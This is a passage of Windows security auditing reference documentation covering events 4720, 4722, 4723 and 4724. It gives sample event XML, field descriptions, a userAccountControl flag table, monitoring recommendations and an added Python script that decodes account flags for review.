    <Data Name="SubjectLogonId">0x30dc2</Data>
    <Data Name="PrivilegeList">-</Data>
    <Data Name="SamAccountName">ksmith</Data>
    <Data Name="DisplayName">Ken Smith</Data>
    <Data Name="UserPrincipalName">ksmith@contoso.local</Data>
    <Data Name="HomeDirectory">-</Data>
    <Data Name="HomePath">-</Data>
    <Data Name="ScriptPath">-</Data>
    <Data Name="ProfilePath">-</Data>
    <Data Name="UserWorkstations">-</Data>
    <Data Name="PasswordLastSet">%%1794</Data>
    <Data Name="AccountExpires">%%1794</Data>
    <Data Name="PrimaryGroupId">513</Data>
    <Data Name="AllowedToDelegateTo">-</Data>
    <Data Name="OldUacValue">0x0</Data>
    <Data Name="NewUacValue">0x15</Data>
    <Data Name="UserAccountControl">%%2080 %%2082 %%2084</Data>
    <Data Name="UserParameters">-</Data>
    <Data Name="SidHistory">-</Data>
    <Data Name="LogonHours">%%1793</Data>
  </EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested the “create user account” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note: A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “create user account”
operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
New Account:
Security ID [Type = SID]: SID of the created user account. Event Viewer automatically tries to resolve SIDs and
show the account name. If the SID cannot be resolved, you will see the source data in the event.
Account Name [Type = UnicodeString]: the name of the user account that was created. For example:
dadmin.
Account Domain [Type = UnicodeString]: domain name of the created user account. Formats vary, and
include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For local accounts, this field will contain the name of the computer to which this new account
belongs, for example: “Win81”.
Attributes:
SAM Account Name [Type = UnicodeString]: logon name for the account used to support clients and servers
from previous versions of Windows (pre-Windows 2000 logon name). The value of the sAMAccountName
attribute of the new user object. For example: ksmith. For a local account this field contains the name of the
new user account.
Display Name [Type = UnicodeString]: the value of the displayName attribute of the new user object. It is the
name displayed in the address book for a particular account. This is usually the combination of the user's
first name, middle initial, and last name. For example, Ken Smith. You can change this attribute by using
Active Directory Users and Computers, or through a script, for example. Local accounts contain the Full Name
attribute in this field, but for new local accounts this field typically has value “<value not set>”.
User Principal Name [Type = UnicodeString]: internet-style login name for the account, based on the
Internet standard RFC 822. By convention this should map to the account's email name. This parameter
contains the value of the userPrincipalName attribute of the new user object. For example, ksmith@contoso.local.
For local users this field is not applicable and has value “-”. You can change this attribute by using Active
Directory Users and Computers, or through a script, for example.
Home Directory [Type = UnicodeString]: user's home directory. If the homeDrive attribute is set and specifies
a drive letter, homeDirectory should be a UNC path. The path must be a network UNC of the form
\\Server\Share\Directory. This parameter contains the value of the homeDirectory attribute of the new user
object. For new local accounts this field typically has value “<value not set>”. You can change this attribute
by using Active Directory Users and Computers, or through a script, for example. This parameter might not
be captured in the event, and in that case appears as “-”.
Home Drive [Type = UnicodeString]: specifies the drive letter to which to map the UNC path specified by
the account’s homeDirectory attribute. The drive letter must be specified in the form “DRIVE_LETTER:”, for
example “H:”. This parameter contains the value of the homeDrive attribute of the new user object. You can
change this attribute by using Active Directory Users and Computers, or through a script, for example. This
parameter might not be captured in the event, and in that case appears as “-”. For new local accounts this
field typically has value “<value not set>”.
Script Path [Type = UnicodeString]: specifies the path of the account’s logon script. This parameter
contains the value of the scriptPath attribute of the new user object. You can change this attribute by using Active
Directory Users and Computers, or through a script, for example. This parameter might not be captured in
the event, and in that case appears as “-”. For new local accounts this field typically has value “<value not
set>”.
Profile Path [Type = UnicodeString]: specifies a path to the account's profile. This value can be a null string,
a local absolute path, or a UNC path. This parameter contains the value of the profilePath attribute of the new
user object. You can change this attribute by using Active Directory Users and Computers, or through a script, for
example. This parameter might not be captured in the event, and in that case appears as “-”. For new local
accounts this field typically has value “<value not set>”.
User Workstations [Type = UnicodeString]: contains the list of NetBIOS or DNS names of the computers
from which the user can log on. Each computer name is separated by a comma. The name of a computer is
the sAMAccountName property of a user object. This parameter contains the value of the userWorkstations
attribute of the new user object. You can change this attribute by using Active Directory Users and Computers,
or through a script, for example. This parameter might not be captured in the event, and in that case appears
as “-”. For local users this field is not applicable and typically has value “<value not set>”.
Password Last Set [Type = UnicodeString]: last time the account’s password was modified. For a manually
created user account, using the Active Directory Users and Computers snap-in, this field typically has value
“<never>”. This parameter contains the value of the pwdLastSet attribute of the new user object.
Account Expires [Type = UnicodeString]: the date when the account expires. This parameter contains the
value of the accountExpires attribute of the new user object. You can change this attribute by using Active
Directory Users and Computers, or through a script, for example. This parameter might not be captured in
the event, and in that case appears as “-”. For manually created local and domain user accounts this field
typically has value “<never>”.
Primary Group ID [Type = UnicodeString]: Relative Identifier (RID) of the user object’s primary group.

Note: A relative identifier (RID) is a variable length number that is assigned to objects at creation and
becomes part of the object's Security Identifier (SID) that uniquely identifies an account or group within a
domain.

Typically, the Primary Group field for new user accounts has the following value:
513 (Domain Users. For local accounts this RID means Users) – for domain and local users.
See https://support.microsoft.com/kb/243330 for more information. This parameter contains the
value of the primaryGroupID attribute of the new user object.
Allowed To Delegate To [Type = UnicodeString]: the list of SPNs to which this account can present delegated
credentials. Can be changed using the Active Directory Users and Computers management console in the
Delegation tab of the user account, if this account has at least one SPN registered. This parameter contains the
value of the AllowedToDelegateTo attribute of the new user object. For local user accounts this field is not
applicable and typically has value “-”. For new domain user accounts it typically has value “-”. See the
description of the AllowedToDelegateTo field for “4738(S): A user account was changed.” for more details.

Note: A Service Principal Name (SPN) is the name by which a client uniquely identifies an instance of a
service. If you install multiple instances of a service on computers throughout a forest, each instance must have
its own SPN. A given service instance can have multiple SPNs if there are multiple names that clients might
use for authentication. For example, an SPN always includes the name of the host computer on which the
service instance is running, so a service instance might register an SPN for each name or alias of its host.

Old UAC Value [Type = UnicodeString]: specifies flags that control password, lockout, disable/enable,
script, and other behavior for the user account. The Old UAC value is always “0x0” for new user accounts. This
parameter contains the previous value of the userAccountControl attribute of the user object.
New UAC Value [Type = UnicodeString]: specifies flags that control password, lockout, disable/enable,
script, and other behavior for the user account. This parameter contains the value of the userAccountControl
attribute of the new user object.
To decode this value, you can go through the property value definitions in the “Table 7. User’s or Computer’s
account UAC flags.” from largest to smallest. Compare each property value to the flags value in the event. If the
flags value in the event is greater than or equal to the property value, then the property is "set" and applies to that
event. Subtract the property value from the flags value in the event and note that the flag applies and then go on to
the next flag.
Here's an example: Flags value from event: 0x15
Decoding:
• PASSWD_NOTREQD 0x0020
• LOCKOUT 0x0010
• HOMEDIR_REQUIRED 0x0008
• (undeclared) 0x0004
• ACCOUNTDISABLE 0x0002
• SCRIPT 0x0001
0x0020 > 0x15, so PASSWD_NOTREQD does not apply to this event
0x10 < 0x15, so LOCKOUT applies to this event. 0x15 - 0x10 = 0x5
0x4 < 0x5, so the undeclared value is set. We'll pretend it doesn't mean anything. 0x5 - 0x4 = 0x1
0x2 > 0x1, so ACCOUNTDISABLE does not apply to this event
0x1 = 0x1, so SCRIPT applies to this event. 0x1 - 0x1 = 0x0, we're done.
So this UAC flags value decodes to: LOCKOUT and SCRIPT
User Account Control [Type = UnicodeString]: shows the list of changes in userAccountControl attribute.
You will see a line of text for each change. For new user accounts, when the object for this account was created,
the userAccountControl value was considered to be “0x0”, and then it was changed from “0x0” to the real
value for the account's userAccountControl attribute. See possible values in the table below. In the “User
Account Control field text” column, you can see the text that will be displayed in the User Account Control
field in 4720 event.

| Flag name | userAccountControl in hexadecimal | userAccountControl in decimal | Description | User Account Control field text |
|---|---|---|---|---|
| SCRIPT | 0x0001 | 1 | The logon script will be run. | Changes of this flag do not show in 4720 events. |
| ACCOUNTDISABLE | 0x0002 | 2 | The user account is disabled. | Account Disabled; Account Enabled |
| Undeclared | 0x0004 | 4 | This flag is undeclared. | Changes of this flag do not show in 4720 events. |
| HOMEDIR_REQUIRED | 0x0008 | 8 | The home folder is required. | 'Home Directory Required' - Enabled; 'Home Directory Required' - Disabled |
| LOCKOUT | 0x0010 | 16 | | Changes of this flag do not show in 4720 events. |
| PASSWD_NOTREQD | 0x0020 | 32 | No password is required. | 'Password Not Required' - Enabled; 'Password Not Required' - Disabled |
| PASSWD_CANT_CHANGE | 0x0040 | 64 | The user cannot change the password. This is a permission on the user's object. | Changes of this flag do not show in 4720 events. |
| ENCRYPTED_TEXT_PWD_ALLOWED | 0x0080 | 128 | The user can send an encrypted password. Can be set using the “Store password using reversible encryption” checkbox. | 'Encrypted Text Password Allowed' - Disabled; 'Encrypted Text Password Allowed' - Enabled |
| TEMP_DUPLICATE_ACCOUNT | 0x0100 | 256 | This is an account for users whose primary account is in another domain. This account provides user access to this domain, but not to any domain that trusts this domain. This is sometimes referred to as a local user account. | Cannot be set for computer account. |
| NORMAL_ACCOUNT | 0x0200 | 512 | This is a default account type that represents a typical user. | 'Normal Account' - Disabled; 'Normal Account' - Enabled |
| INTERDOMAIN_TRUST_ACCOUNT | 0x0800 | 2048 | This is a permit to trust an account for a system domain that trusts other domains. | Cannot be set for computer account. |
| WORKSTATION_TRUST_ACCOUNT | 0x1000 | 4096 | This is a computer account for a computer that is running Microsoft Windows NT 4.0 Workstation, Microsoft Windows NT 4.0 Server, Microsoft Windows 2000 Professional, or Windows 2000 Server and is a member of this domain. | 'Workstation Trust Account' - Disabled; 'Workstation Trust Account' - Enabled |
| SERVER_TRUST_ACCOUNT | 0x2000 | 8192 | This is a computer account for a domain controller that is a member of this domain. | 'Server Trust Account' - Enabled; 'Server Trust Account' - Disabled |
| DONT_EXPIRE_PASSWORD | 0x10000 | 65536 | Represents the password, which should never expire on the account. Can be set using the “Password never expires” checkbox. | 'Don't Expire Password' - Disabled; 'Don't Expire Password' - Enabled |
| MNS_LOGON_ACCOUNT | 0x20000 | 131072 | This is an MNS logon account. | 'MNS Logon Account' - Disabled; 'MNS Logon Account' - Enabled |
| SMARTCARD_REQUIRED | 0x40000 | 262144 | When this flag is set, it forces the user to log on by using a smart card. | 'Smartcard Required' - Disabled; 'Smartcard Required' - Enabled |
| TRUSTED_FOR_DELEGATION | 0x80000 | 524288 | When this flag is set, the service account (the user or computer account) under which a service runs is trusted for Kerberos delegation. Any such service can impersonate a client requesting the service. To enable a service for Kerberos delegation, you must set this flag on the userAccountControl property of the service account. If you enable Kerberos constrained or unconstrained delegation or disable these types of delegation in the Delegation tab you will get this flag changed. | 'Trusted For Delegation' - Enabled; 'Trusted For Delegation' - Disabled |
| NOT_DELEGATED | 0x100000 | 1048576 | When this flag is set, the security context of the user is not delegated to a service even if the service account is set as trusted for Kerberos delegation. Can be set using the “Account is sensitive and cannot be delegated” checkbox. | 'Not Delegated' - Disabled; 'Not Delegated' - Enabled |
| USE_DES_KEY_ONLY | 0x200000 | 2097152 | Restrict this principal to use only Data Encryption Standard (DES) encryption types for keys. Can be set using the “Use Kerberos DES encryption types for this account” checkbox. | 'Use DES Key Only' - Disabled; 'Use DES Key Only' - Enabled |
| DONT_REQ_PREAUTH | 0x400000 | 4194304 | This account does not require Kerberos pre-authentication for logging on. Can be set using the “Do not require Kerberos preauthentication” checkbox. | 'Don't Require Preauth' - Disabled; 'Don't Require Preauth' - Enabled |
| PASSWORD_EXPIRED | 0x800000 | 8388608 | The user's password has expired. | Changes of this flag do not show in 4720 events. |
| TRUSTED_TO_AUTH_FOR_DELEGATION | 0x1000000 | 16777216 | The account is enabled for delegation. This is a security-sensitive setting. Accounts that have this option enabled should be tightly controlled. This setting lets a service that runs under the account assume a client's identity and authenticate as that user to other remote servers on the network. If you enable Kerberos protocol transition delegation or disable this type of delegation in the Delegation tab you will get this flag changed. | 'Trusted To Authenticate For Delegation' - Disabled; 'Trusted To Authenticate For Delegation' - Enabled |
| PARTIAL_SECRETS_ACCOUNT | 0x04000000 | 67108864 | The account is a read-only domain controller (RODC). This is a security-sensitive setting. Removing this setting from an RODC compromises security on that server. | No information. |
For new, manually created, domain or local user accounts typical flags are:
Account Disabled
'Password Not Required' - Enabled
'Normal Account' – Enabled
After the new user creation event you will typically see a couple of “4738: A user account was changed.” events
with new flags:
'Password Not Required' – Disabled
Account Enabled
User Parameters [Type = UnicodeString]: if you change any setting in the Dial-in tab of the user’s account
properties using the Active Directory Users and Computers management console, you will see <value
changed, but not displayed> in this field in “4738: A user account was changed.” This parameter might
not be captured in the event, and in that case appears as “-”. For new local accounts this field typically has
the value “<value not set>”.
SID History [Type = UnicodeString]: contains previous SIDs used for the object if the object was moved
from another domain. Whenever an object is moved from one domain to another, a new SID is created and
becomes the objectSID. The previous SID is added to the sIDHistory property. This parameter contains the
value of sIDHistory attribute of new user object. This parameter might not be captured in the event, and in
that case appears as “-”.
Logon Hours [Type = UnicodeString]: hours during which the account is allowed to log on to the domain. The value
of the logonHours attribute of the new user object. You can change this attribute by using Active Directory Users
and Computers, or through a script, for example. You will typically see the “<value not set>” value for new
manually created user accounts in event 4720. For new local accounts this field is not applicable and
typically has the value “All”.
Additional Information:
Privileges [Type = UnicodeString]: the list of user privileges which were used during the operation, for
example, SeBackupPrivilege. This parameter might not be captured in the event, and in that case appears as “-”.
See full list of user privileges in “Table 8. User Privileges.”.

Security Monitoring Recommendations
For 4720(S): A user account was created.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

Some organizations monitor every 4720 event.

Consider whether to track the following fields and values:

| FIELD AND VALUE TO TRACK | REASON TO TRACK |
|---|---|
| SAM Account Name is empty or - | This field must contain the user account name. If it is empty or -, it might indicate an anomaly. |
| User Principal Name is empty or - | Typically this field should not be empty for new user accounts. If it is empty or -, it might indicate an anomaly. |
| Home Directory is not -; Home Drive is not -; Script Path is not -; Profile Path is not -; User Workstations is not - | Typically these fields are - for new user accounts. Other values might indicate an anomaly and should be monitored. For local accounts these fields should display <value not set>. |
| Password Last Set is <never> | This typically means this is a manually created user account, which you might need to monitor. |
| Password Last Set is a time in the future | This might indicate an anomaly. |
| Account Expires is not <never> | Typically this field is <never> for new user accounts. Other values might indicate an anomaly and should be monitored. |
| Primary Group ID is not 513 | Typically, the Primary Group value is 513 for domain and local users. Other values should be monitored. |
| Allowed To Delegate To is not - | Typically this field is - for new user accounts. Other values might indicate an anomaly and should be monitored. |
| Old UAC Value is not 0x0 | Typically this field is 0x0 for new user accounts. Other values might indicate an anomaly and should be monitored. |
| SID History is not - | This field will always be set to - unless the account was migrated from another domain. |
| Logon Hours value other than <value not set> or “All” | This should always be <value not set> for new domain user accounts, and “All” for new local user accounts. |

Consider whether to track the following user account control flags:

| USER ACCOUNT CONTROL FLAG TO TRACK | INFORMATION ABOUT THE FLAG |
|---|---|
| 'Normal Account' – Disabled | Should not be disabled for user accounts. |
| 'Encrypted Text Password Allowed' – Enabled; 'Smartcard Required' – Enabled; 'Not Delegated' – Enabled; 'Use DES Key Only' – Enabled; 'Don't Require Preauth' – Enabled; 'Trusted To Authenticate For Delegation' – Enabled | By default, these flags should not be enabled for new user accounts created with the “Active Directory Users and Computers” snap-in. |
| 'Server Trust Account' – Enabled | Should never be enabled for user accounts. Applies only to domain controller (computer) accounts. |
| 'Don't Expire Password' – Enabled | Should be monitored for critical accounts, or all accounts if your organization does not allow this flag. By default, this flag should not be enabled for new user accounts created with the “Active Directory Users and Computers” snap-in. |
| 'Trusted For Delegation' – Enabled | By default, this flag should not be enabled for new user accounts created with the “Active Directory Users and Computers” snap-in. It is enabled by default only for new domain controllers. |
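The decoder below is an added example, not code from this reference: it applies the hexadecimal bit values of the flag table and the flag-tracking recommendations to a userAccountControl attribute value (the LDAP attribute the table describes; the Old/New UAC Value fields inside the event itself use a different bit layout, so use this on the attribute, not on the event's hex field). The policy strings mirror the recommendation table and the sample values in main() are constructed.

```python
"""Decode a userAccountControl attribute value with the hexadecimal bit values
from the flag table and apply the 4720 flag-tracking recommendations.
Added example, not code from the Microsoft documentation; the policy text
mirrors the recommendation table and the sample values are constructed."""

# Bit values from the hexadecimal column of the userAccountControl flag table.
UAC_FLAGS = {
    0x1: "SCRIPT",
    0x2: "ACCOUNTDISABLE",
    0x8: "HOMEDIR_REQUIRED",
    0x10: "LOCKOUT",
    0x20: "PASSWD_NOTREQD",
    0x40: "PASSWD_CANT_CHANGE",
    0x80: "ENCRYPTED_TEXT_PWD_ALLOWED",
    0x100: "TEMP_DUPLICATE_ACCOUNT",
    0x200: "NORMAL_ACCOUNT",
    0x800: "INTERDOMAIN_TRUST_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x20000: "MNS_LOGON_ACCOUNT",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
    0x4000000: "PARTIAL_SECRETS_ACCOUNT",
}

# "User Account Control" field text the event uses for the flags that the
# monitoring table asks you to track (quoted from the tables above).
FIELD_TEXT = {
    "NORMAL_ACCOUNT": "'Normal Account'",
    "ENCRYPTED_TEXT_PWD_ALLOWED": "'Encrypted Text Password Allowed'",
    "SMARTCARD_REQUIRED": "'Smartcard Required'",
    "NOT_DELEGATED": "'Not Delegated'",
    "USE_DES_KEY_ONLY": "'Use DES Key Only'",
    "DONT_REQ_PREAUTH": "'Don't Require Preauth'",
    "TRUSTED_TO_AUTH_FOR_DELEGATION": "'Trusted To Authenticate For Delegation'",
    "SERVER_TRUST_ACCOUNT": "'Server Trust Account'",
    "DONT_EXPIRE_PASSWORD": "'Don't Expire Password'",
    "TRUSTED_FOR_DELEGATION": "'Trusted For Delegation'",
}

# Flags that raise a finding when set on a user account, with the reason
# the monitoring table gives.
NOT_DEFAULT = ("should not be enabled by default for new user accounts created "
               "with the Active Directory Users and Computers snap-in")
TRACKED_WHEN_ENABLED = {
    "ENCRYPTED_TEXT_PWD_ALLOWED": NOT_DEFAULT,
    "SMARTCARD_REQUIRED": NOT_DEFAULT,
    "NOT_DELEGATED": NOT_DEFAULT,
    "USE_DES_KEY_ONLY": NOT_DEFAULT,
    "DONT_REQ_PREAUTH": NOT_DEFAULT,
    "TRUSTED_TO_AUTH_FOR_DELEGATION": NOT_DEFAULT,
    "SERVER_TRUST_ACCOUNT": "should never be enabled for user accounts; applies only to domain controller (computer) accounts",
    "DONT_EXPIRE_PASSWORD": "should be monitored for critical accounts, or all accounts if your organization does not allow this flag",
    "TRUSTED_FOR_DELEGATION": "enabled by default only for new domain controllers",
}


def decode_uac(value: int) -> list:
    """Names of the bits set in a userAccountControl value, lowest bit first.
    Bits the table does not define are reported as UNKNOWN(0x...)."""
    names = [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]
    unknown = value & ~sum(UAC_FLAGS)  # sum of the dict keys = mask of known bits
    if unknown:
        names.append(f"UNKNOWN(0x{unknown:X})")
    return names


def review_uac(value: int) -> list:
    """Findings for a user account's value, per the flag-tracking table."""
    flags = decode_uac(value)
    findings = []
    if "NORMAL_ACCOUNT" not in flags:
        findings.append("'Normal Account' - Disabled: should not be disabled for user accounts")
    for name in flags:  # bit order keeps the output deterministic
        if name in TRACKED_WHEN_ENABLED:
            findings.append(f"{FIELD_TEXT[name]} - Enabled: {TRACKED_WHEN_ENABLED[name]}")
    return findings


def uac_changes(old: int, new: int) -> list:
    """Flags that differ between two values, in the 'Flag - Enabled/Disabled'
    form the follow-up 4738 events use after a 4720."""
    changes = []
    for bit, name in sorted(UAC_FLAGS.items()):
        if (old ^ new) & bit:
            changes.append(f"{name} - {'Enabled' if new & bit else 'Disabled'}")
    return changes


if __name__ == "__main__":
    # Constructed values: a freshly created account (disabled, password not
    # required, normal account) and the same account after it was enabled.
    created = 0x2 | 0x20 | 0x200
    enabled = 0x200
    print(decode_uac(created))
    print(uac_changes(created, enabled))
    print(review_uac(0x200 | 0x10000 | 0x400000))  # two tracked flags set
```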
4722(S): A user account was enabled.
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit User Account Management
Event Description:
This event generates every time a user or computer object is enabled.
For user accounts, this event generates on domain controllers, member servers, and workstations.
For computer accounts, this event generates only on domain controllers.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4722</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-21T23:55:11.038308600Z" />
<EventRecordID>175716</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="1112" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">Auditor</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-2104</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x30d5f</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “enable account” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “enable account”
operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Target Account:
Security ID [Type = SID]: SID of account that was enabled. Event Viewer automatically tries to resolve
SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.
Account Name [Type = UnicodeString]: the name of the account that was enabled.
Account Domain [Type = UnicodeString]: target account’s domain or computer name. Formats vary, and
include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.

Security Monitoring Recommendations
For 4722(S): A user account was enabled.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have a high-value domain or local account for which you need to monitor every change, monitor all
4722 events with the “Target Account\Security ID” that corresponds to the account.
If you have domain or local accounts that should never be enabled, you can monitor all 4722 events with
the “Target Account\Security ID” fields that correspond to the accounts.
We recommend monitoring all 4722 events for local accounts, because these accounts usually do not
change often. This is especially relevant for critical servers, administrative workstations, and other high
value assets.
4723(S, F): An attempt was made to change an
account's password.
4/5/2019 • 4 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit User Account Management
Event Description:
This event generates every time a user attempts to change his or her password.
For user accounts, this event generates on domain controllers, member servers, and workstations.
For domain accounts, a Failure event generates if the new password fails to meet the password policy.
For local accounts, a Failure event generates if the new password fails to meet the password policy or the old password is wrong.
For domain accounts, if the old password was wrong, then “4771: Kerberos pre-authentication failed” or “4776: The computer attempted to validate the credentials for an account” will be generated on the domain controller if the corresponding subcategories were enabled on it.
Typically you will see 4723 events with the same Subject\Security ID and Target Account\Security ID fields, which is normal behavior.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4723</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-22T01:32:51.494558000Z" />
<EventRecordID>175722</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="1112" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">dadmin</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x1a9b76</Data>
<Data Name="PrivilegeList">-</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that made an attempt to change Target’s Account password. Event
Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will
see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that made an attempt to change Target’s
Account password.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Target Account: account for which the password change was requested.
Security ID [Type = SID]: SID of account for which the password change was requested. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see
the source data in the event.
Account Name [Type = UnicodeString]: the name of the account for which the password change was
requested.
Account Domain [Type = UnicodeString]: target account’s domain or computer name. Formats vary, and
include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Additional Information:
Privileges [Type = UnicodeString]: the list of user privileges which were used during the operation, for
example, SeBackupPrivilege. This parameter might not be captured in the event, and in that case appears as “-”.
See full list of user privileges in “Table 8. User Privileges.”.

Security Monitoring Recommendations
For 4723(S, F): An attempt was made to change an account's password.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have a high-value domain or local user account for which you need to monitor every password
change attempt, monitor all 4723 events with the “Target Account\Security ID” that corresponds to the
account.
If you have a high-value domain or local account for which you need to monitor every change, monitor all
4723 events with the “Target Account\Security ID” that corresponds to the account.
If you have domain or local accounts for which the password should never be changed, you can monitor all
4723 events with the “Target Account\Security ID” that corresponds to the account.
4724(S, F): An attempt was made to reset an
account's password.
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit User Account Management
Event Description:
This event generates every time an account attempts to reset the password for another account.
For user accounts, this event generates on domain controllers, member servers, and workstations.
For domain accounts, a Failure event generates if the new password fails to meet the password policy.
A Failure event does NOT generate if the user gets “Access Denied” while doing the password reset procedure.
This event also generates if a computer account reset procedure was performed.
For local accounts, a Failure event generates if the new password fails to meet the local password policy.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4724</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-22T01:58:21.725864900Z" />
